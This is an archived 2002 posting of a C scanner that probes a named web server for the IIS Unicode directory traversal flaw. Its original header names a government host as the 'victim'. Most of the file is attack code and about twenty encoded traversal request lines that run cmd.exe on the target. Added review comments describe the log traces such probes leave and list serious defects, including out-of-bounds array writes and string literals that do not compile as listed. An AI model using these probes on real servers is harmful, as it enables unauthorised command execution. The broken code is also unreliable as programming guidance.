
iss.c

iss.c
Posted Sep 25, 2002
Authored by Rammstein

This tool can be used to scan IIS servers for the unicode directory traversal vulnerability.

tags | cgi
systems | unix
MD5 | 9992afec563d973be3af36bcfa97c9f1

iss.c

/* Searches for the Unicode bug on IIS web servers (written "iss" in the original)
*
* Rammstein - admin@xmirc.com - irc.ada.net.tr #root
*
* Rooting Sabotage Forced - www.rooting.cjb.net
*
* Usage: ./iss www.victim.telekom.gov.tr :)))
*
* To compile with gcc: gcc -o iss iss.c
*
* The code of this program is not entirely mine. I made the necessary changes
* and fixed it up with the most commonly found Unicode bugs. Thanks to
* PcKiLLeR - CiLeK - Cancer-X - Sephiroth, who contributed to the program :)
*/

#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>



/*
 * main - probe one web server for encoded directory-traversal requests.
 *
 * argv[1] is the host name to check.  The function resolves it, connects to
 * TCP port 80, sends one "HEAD /" request, then opens a fresh connection per
 * probe and sends GET request lines taken from tmp[].  A probe is reported
 * as a hit when the first bytes of the reply contain the text "200".
 *
 * Defender view: each probe is a bare HTTP/1.0 request line followed by an
 * empty line, with no Host or User-Agent header, and the URI carries an
 * encoded "../" sequence (%255c, %252f, %c0%af, %c1%9c, ...) ending in
 * cmd.exe?/c+dir.  One HEAD followed by a burst of such GETs from the same
 * source, each on its own connection, is what this program leaves in web
 * server access logs.  A server that canonicalises the URL before its path
 * check should not answer these with status 200.
 *
 * NOTE(review): "void main" is not a standard signature; main should return
 * int.  As listed, the function also does not compile: three string
 * literals are split across physical lines (the usage line and both final
 * messages), presumably a line-wrap artefact of the listing - confirm
 * against the original file.
 */
void main(int argc, char *argv[])
{

/* bulunan: strstr() result; tampon: reply to the HEAD request;
 * mesaj: status text that counts as a hit; toplam: probe index;
 * sayac: loop counter; buldum: number of hits; shoptampon: first bytes
 * of each probe reply. */
char *bulunan;
char tampon[1024];
char mesaj[] = "200";
int toplam=0;
int sayac;
int buldum=0;
char shoptampon[20];
/* NOTE(review): both arrays hold 10 pointers (valid indices 0..9) but the
 * assignments below store to indices 1..25.  Every store from index 10
 * upward writes past the end of the array, which is undefined behaviour
 * and overwrites neighbouring stack data.  Index 0 is never assigned. */
char *tmp[10];
char *hata[10];


/* addr is declared but never used in this function. */
int sock;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long giris;
unsigned long duzelt;


/* Probe request lines.  They are passed to send() unchanged, not used as a
 * printf format, so "%%" goes out on the wire as two percent characters.
 * NOTE(review): the "c:\ " entries contain a backslash followed by a space,
 * which is not a valid C escape sequence; what ends up in the string
 * depends on the compiler.  Requests end in "\n\n" rather than CRLF CRLF. */
tmp[1]="GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[2]="GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[3]="GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[4]="GET /iisadmpwd/..%c0%af../cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[5]="GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[6]="GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[7]="GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[8]="GET /scripts/..%255c..%255cwindows/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[9]="GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[10]="GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[11]="GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[12]="GET /samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[13]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[14]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[15]="GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[16]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[17]="GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[18]="GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[19]="GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[20]="GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[21]="GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[22]="GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[23]="GET /..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";
tmp[24]="GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";
tmp[25]="GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";

/* Display form of each probe (the URI only), printed when the probe with
 * the same index is reported as a hit. */
hata[1] = "/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir ";
hata[2] = "/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir ";
hata[3] = "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir ";
hata[4] = "/iisadmpwd/..%c0%af../cmd.exe?/c+dir ";
hata[5] = "/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[6] = "/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[7] = "/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir ";
hata[8] = "/scripts/..%255c..%255cwindows/system32/cmd.exe?/c+dir ";
hata[9] = "/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[10] = "/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir ";
hata[11] = "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir ";
hata[12] = "/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir ";
hata[13] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ ";
hata[14] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[15] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[16] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[17] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[18] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[19] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[20] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir ";
hata[21] = "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir ";
hata[22] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
hata[23] = "/..%c0%af../winnt/system32/cmd.exe?/c+dir ";
hata[24] = "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ ";
hata[25] = "/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ ";

/* No host argument: clear the terminal through the shell, print the banner
 * and the usage line ("KullanImI" = "Usage"), then exit with status 0. */
if (argc<2)
{
system("clear");
printf("\n\t _ ");
printf("\n\t|_ ._ _ _ | o ");
printf("\n\t|_ | (/_ (_| | | ");
printf("\n\t _| ");
printf("\n\nUnicode Scanner (c) 2002 ");
printf("\nKullanImI : %s www.victim.telekom.gov.tr
\n\n",argv[0]);

exit(0);
}

/* Resolve the host name.  NOTE(review): a lookup failure also exits with
 * status 0, so callers cannot tell it apart from success. */
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
system("clear");
printf("\n\t _ ");
printf("\n\t|_ ._ _ _ | o ");
printf("\n\t|_ | (/_ (_| | | ");
printf("\n\t _| ");
printf("\n\t Unicode Scanner (c) 2002 ");

/* giris and duzelt are computed here and never read again in this
 * function.  NOTE(review): inet_addr() is declared in <arpa/inet.h>, which
 * is not among the headers this listing includes. */
giris=inet_addr(argv[1]);

duzelt=ntohl(giris);

/* First connection: one HEAD request to port 80.
 * NOTE(review): the socket() result is not checked, and sin is never
 * zeroed - only sin_addr, sin_family and sin_port are set. */
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

/* A failed connect is only reported; execution continues and the send and
 * recv below then run on an unconnected socket. */
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}
send(sock, "HEAD / HTTP/1.0\n\n",17,0);

/* NOTE(review): the recv() return value is ignored and tampon is never
 * NUL-terminated, so printf("%s") can read uninitialised bytes or run past
 * the buffer.  The terminal is cleared right after, so the printed reply
 * is wiped again.  "Tarama YapILIyor.." = "Scanning...". */
recv(sock, tampon, sizeof(tampon),0);
printf("%s",tampon);
close(sock);
system("clear");
printf("Tarama YapILIyor..\n\n");

/* toplam is incremented as part of the test, so the body runs with
 * toplam = 1..8: only the first eight probes are sent and entries 9..25
 * of tmp[] and hata[] are never used by this loop. */
while(toplam++ < 8)
{
/* One new TCP connection per probe; same unchecked socket()/connect()
 * pattern as above. */
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}

/* Clear the 20-byte reply buffer before reuse. */
for(sayac=0;sayac < 20;sayac++)
{
shoptampon[sayac] = '\0';
}

/* NOTE(review): recv() may fill all 20 bytes, leaving no terminator for
 * the strstr() below, which can then read past the buffer. */
send(sock, tmp[toplam],strlen(tmp[toplam]),0);
recv(sock, shoptampon, sizeof(shoptampon),0);

/* Hit test: the text "200" anywhere in the first bytes of the reply.  The
 * response body is not inspected, so any reply that starts with a 200
 * status line presumably counts, including a custom error page served
 * with status 200 - treat a reported hit as unconfirmed. */
bulunan = strstr(shoptampon,mesaj);

/* Message means roughly "OK, unicode bug found, job done". */
if( bulunan != NULL)
{
printf("%s : ",hata[toplam]);
printf(" Okey unicode bug Bulundu bu iþ tamam :\)\n");++buldum;
}
close(sock);
}

/* Summary: "scan of web site %s finished" when at least one probe hit,
 * otherwise "sorry, the scan found no Unicode bug". */
if (buldum)
{
printf("\n Tarama isLemi %s web Sitesi icin
bitti.\n", argv[1]);
}
else printf ("\n Uzgunum tarama sonucunda Unicode bugu
bulunamamIstIr...\n\n");

}